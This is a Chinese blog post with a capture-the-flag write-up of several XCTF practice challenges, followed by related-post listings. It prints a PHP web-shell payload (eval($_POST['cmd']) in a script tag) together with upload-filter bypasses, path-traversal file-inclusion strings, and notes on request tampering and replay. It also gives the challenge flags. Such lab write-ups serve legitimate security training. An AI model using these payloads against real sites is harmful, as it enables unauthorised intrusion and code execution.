XCTF靶场实战(3)

最新推荐文章于 2022-11-18 16:20:47 发布
最新推荐文章于 2022-11-18 16:20:47 发布
阅读量1.3k 收藏
点赞数
分类专栏: 靶场与CTF系列 文章标签: 网络 web安全 安全 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123823188
版权
lottery
这是一个菠菜网站的源码
先正常注册一个账户  之后会送你20美元用于菠菜
之后要通过赢的美元去购买相应的flag
接下来对网站进行扫描
接下来可以通过gitHack工具下载相应的网站源码
分析后找到了漏洞的位置  接下来我们需要对抓包得到的数据包进行修改
之后放行 钱就增加了很多了。之后可以通过重放模块去刷钱 刷够了买payload即可
bug
进入以后先正常注册用户
之后登录
通过抓包分析以后 发现登陆以后没有越权漏洞可以利用
那我们可以抓包分析找回密码的功能
我们可以放包继续下一步
此时发现越权成功  我们直接登录admin账户
之后登录以后点击管理模块发现ip地址有限制
之后我们抓包修改ip源
进行如下猜测(文件管理 要么file  要么upload  要么file_upload之类的)
http://111.200.241.244:54799/index.php?module=filemanage&do=upload
看似只能上传图片 我们把一句话木马上传
但是文件内容中的<?php代码也会被拦截掉 所以php代码不能出现特征标签
绕过方式:
MIME:image/jpeg
GIF89a
可以考虑使用js的代码
<script language="php">eval($_POST['cmd'])</script>
而且对后缀也有过滤 这里可以通过的后缀是php4
cyberpeace{9993cb0261d633a0577b81340bd7b09b}
warmup
<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            //白名单 只允许source.php或者hint.php
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            //在不在白名单中
            if (in_array($page, $whitelist)) {
                return true;
            }
            //取问号前面的东西
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
<img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>
这题已经做过很多次了 这里不多赘述
包含hint.php得到提示
flag在    ffffllllaaaagggg 
/source.php?file=hint.php%25%33%66/../../../../../../../../../../ffffllllaaaagggg
file=hint.php?/../../../../ffffllllaaaagggg
file=hint.php%3f/../../../../ffffllllaaaagggg
file=hint.php%25%33%66/../../../../../../../../../../ffffllllaaaagggg
flag{25e7bce6005c4e0c983fb97297ac6e5a}
小知识:在linux系统的 include后面第一次发现"/"  那么前面的内容自动失效 从这个之后开始包含(../不算 这个不行)
  
12
js可以使用eval把字符串当作js执行,也可以alert弹窗
be0f233ac7be98aa
function $(){var e=document.getElementById("c").value;if(e.length==16)if(e.match(/^be0f23/)!=null)if(e.match(/233ac/)!=null)if(e.match(/e98aa$/)!=null)if(e.match(/c7be9/)!=null){var t=["fl","s_a","i","e}"];var n=["a","_h0l","n"];var r=["g{","e","_0"];var i=["it'","_","n"];var s=[t,n,r,i];for(var o=0;o<13;++o){document.write(s[o%4][0]);s[o%4].splice(0,1)}}}document.write('<input id="c"><button οnclick=$()>Ok</button>');delete _
在代码格式化的框中
function $() {
    var e = document.getElementById("c").value;
    if (e.length == 16) if (e.match(/^be0f23/) != null) if (e.match(/233ac/) != null) if (e.match(/e98aa$/) != null) if (e.match(/c7be9/) != null) {
        var t = ["fl", "s_a", "i", "e}"];
        var n = ["a", "_h0l", "n"];
        var r = ["g{", "e", "_0"];
        var i = ["it'", "_", "n"];
        var s = [t, n, r, i];
        for (var o = 0; o < 13; ++o) {
            document.write(s[o % 4][0]);
            s[o % 4].splice(0, 1)
        }
    }
}
document.write('<input id="c"><button οnclick=$()>Ok</button>');
delete _
正则表达式表示 以be0f23打头,233ac作为中间内容,e98aa作为结尾, c7be9作为中间内容,所以可以进行组合
be0f23  233ac c7be9 e98aa
be0f233ac7be98aa
Simon_Smith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
PHP代码审计入门题
weixin_44022769的博客
03-28 1419
来源:https://buuoj.cn/challenges 点开出现一个滑稽脸 查看网页源代码,发现突破点: 在URL后面拼接这个source.php,发现了source.php文件: http://320a5c2d-1f76-4156-884c-00846ec2ff63.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { pub...
[HCTF 2018]WarmUp
sGanYu
08-24 1464
方法一:打开靶场后,按f12查看源码即可看到<!--source.php-->,根据提示修改URL访问source.php 方法二:利用dirsearch对IP进行目录扫描,同样扫描出目录下的source.php 打开source.php页面,已知信息如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$pag..
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1199
[极客大挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
BUUCTF web之WarmUp 源代码详解
good good study
11-18 2356
前言前言访问除了一张滑稽图,就没其他的了查看源码,有一个注释了的 source.php,可以尝试直接访问一下。同时进行目录扫描访问source.php,里面包含php代码,题目说了是php代码审计,那就先从这里进行分析提取其中的php代码代码分析1. 代码整体结构分析前面两个条件很好满足,只需要 source.php?file=字符串 ,即可。所以重点需要让checkeFile函数返回true,则会进行文件包含2. chechkFile()函数分析。
Buuctf刷题记录
weixin_51706044的博客
09-29 723
[HCTF 2018]WarmUp 这是一道关于代码审计的题通过查看源代码发现了source.php的源文件进入查看 ` <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; .
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
writeup:xctf撰写
03-28
写上去xctf撰写
CTF刷题02
Atkx's Blog
09-27 1136
掀桌子 题目描述:菜狗截获了一份报文如下c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2,生气地掀翻了桌子(╯°□°)╯︵ ┻━┻ 分析这一串字符串,发现由a-z的字母和数字组合而成,我们将字符串整理一下,可以看出是16进制数,其中一组十六进制数fa转化为十进制数是250,所以将每组十六进制数转化为十进制后再减去128
攻防世界-warmup详解
wwxxss
11-10 2191
warmup详解
Buuctf web wareup1
weixin_59453707的博客
07-20 181
打开页面只有一个滑稽的小表情 就需要去查看该页面的源代码(ctrl+u)发现是source.php 通过source.php(即将source.php添加到后边,删除前边的view-source:http://)得到PHP代码 PHP代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) ...
第六周所学
ANYOUZHEN的博客
12-13 2651
1.ctfhub 文件上传 js前端验证 我们上传一句话木马,发现该文件不允许上传,由于是前端验证,我们好几种方法进行绕过 我们可以使用浏览器的编辑功能,将页面中的submit事件删除,这样前端就不会对上传的文件后缀名进行检测,就能达到绕过的目的 将submit删除,上传一句话木马,得到路径,蚁剑连接 得到flag 方法二:抓包后改包,然后发包同样可以得到flag 2. ...
$_REQUEST、$_FILES 变量
HEAT
01-23 388
  $_REQUEST 变量 PHP 的 $_REQUEST 变量包含了 $_GET, $_POST 以及 $_COOKIE 的内容。 PHP 的 $_REQUEST 变量可用来取得通过 GET 和 POST 方法发送的表单数据的结果。   $_FILES['userfile']['name'] 客户端机器文件的原名称。 $_FILES['userfile']['type'] 文件的 M...
【BUUCTF】[网鼎杯 2018]Fakebook
aoao331198的博客
04-09 725
随便注册一个账户后,点击进去 url中的no引人注意,尝试no=0 出现了很多信息,感觉像是sql注入,于是no=1’试试 好,这里存在注入漏洞,一套连招下来,发现union被过滤,select存活,但是据说可以用/**/绕过,反正是没怎么过滤,想怎么来怎么来 不想写中间过程了,轻松爆出了数据库名、表名,看看最后几步 ?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.co
BUUCTF部分题练习
yqdid的博客
05-03 587
[强网杯 2019]随便注 看题目的样子应该是sq注入 先添加单引号 1',发现有报错; 用order by 语句查询到有两列 1' order by 2 # 然后准备用union select 联合查询数据库时,页面回显了过滤提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 根据提示,上面...
Laravel $request->file()无法获取文件
Microven
10-02 4706
问题起因 最近在写一个新项目,前端ajax传输图片给后端 大家都知道laravel获取文件的方式是$request->file(),但是昨天在测试一张图片后发现获取不到(null) 排查阶段 经过上传其他图片反复尝试之后,发现是图片大小过大引起的。 于是乎直接调用PHP的$_FILE[‘file’]输出: { "name": "1947aa24769f9b6a0528c9aa89eca0b.jpg", "type": "", "tmp_name": "", "error": 1, "size
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1641
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1651
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值